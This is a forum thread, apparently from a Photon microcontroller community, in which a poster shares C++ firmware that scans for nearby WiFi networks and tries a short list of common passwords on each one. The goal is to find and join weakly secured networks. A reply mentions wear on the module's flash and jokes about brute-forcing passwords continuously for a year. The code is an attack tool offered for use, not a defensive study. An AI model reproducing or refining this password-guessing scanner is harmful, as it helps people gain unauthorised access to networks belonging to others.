Wifi ambient "hacking"

How feasible do you think it would be to scan for surrounding WiFi networks, then try connecting via a number of regularly used passwords? i.e. a background wifi scanner constantly looking for weakly secured networks.

I’ve got part of the way, but it all seems terribly flaky…

```cpp
void checkCredentials(char *ssid, char *password, int security) {
    Serial.print("Try ");
    Serial.print(String(ssid));
    Serial.print(" with pass ");
    Serial.print(String(password));
    Serial.println();

    // Drop any existing connection and stored credentials, then power-cycle the module
    WiFi.disconnect();
    WiFi.clearCredentials();
    delay(1000);
    WiFi.off();
    delay(1000);
    WiFi.on();
    delay(1000);
    Serial.println("prepping connection");

    // security: 1 = WEP, 2 = WPA, anything else lets the module choose
    if (security == 1) {
        WiFi.setCredentials(String(ssid), String(password), WEP);
    } else if (security == 2) {
        WiFi.setCredentials(String(ssid), String(password), WPA);
    } else {
        WiFi.setCredentials(String(ssid), String(password));
    }

    Serial.println("wifi.connect");
    WiFi.connect();

    // Blocks until the module stops trying; there is no timeout here
    while (WiFi.connecting()) delay(100);
    Serial.println("end wifi.connecting");

    if (WiFi.ready()) {
        Serial.println("SUCCESS");
        Serial.println();
    } else {
        Serial.println("FAIL");
        Serial.println();
    }
}
```

```cpp
WiFiAccessPoint aps[5];
int found = WiFi.scan(aps, 5);
int securityConversion;  // was used without a declaration
for (int i = 0; i < found; i++) {
    WiFiAccessPoint& ap = aps[i];

    // Map the scan result's security type onto the codes checkCredentials() expects
    if (ap.security == 1) {
        securityConversion = 1;
    } else if (ap.security == 2) {
        securityConversion = 2;
    } else {
        securityConversion = 3;
    }

    checkCredentials(ap.ssid, "opensesame", securityConversion);
    checkCredentials(ap.ssid, "comeonin", securityConversion);
    checkCredentials(ap.ssid, "123456789", securityConversion);
}
```

@bufferout, setting credentials so many times may wear out the flash in the WiFi module. Perhaps @mdma or @BDub may have something to say here.

It’s going to be slow going I think, because you’ll have to wait a while to know if it connects or not. Let’s say you force a timeout after 10 seconds. If you tried a new password every 10 seconds, you could easily brute force passwords for a whole year continuously no problem. If the Photon wears out after a year, well… it cost you very little to have your fun :slight_smile:
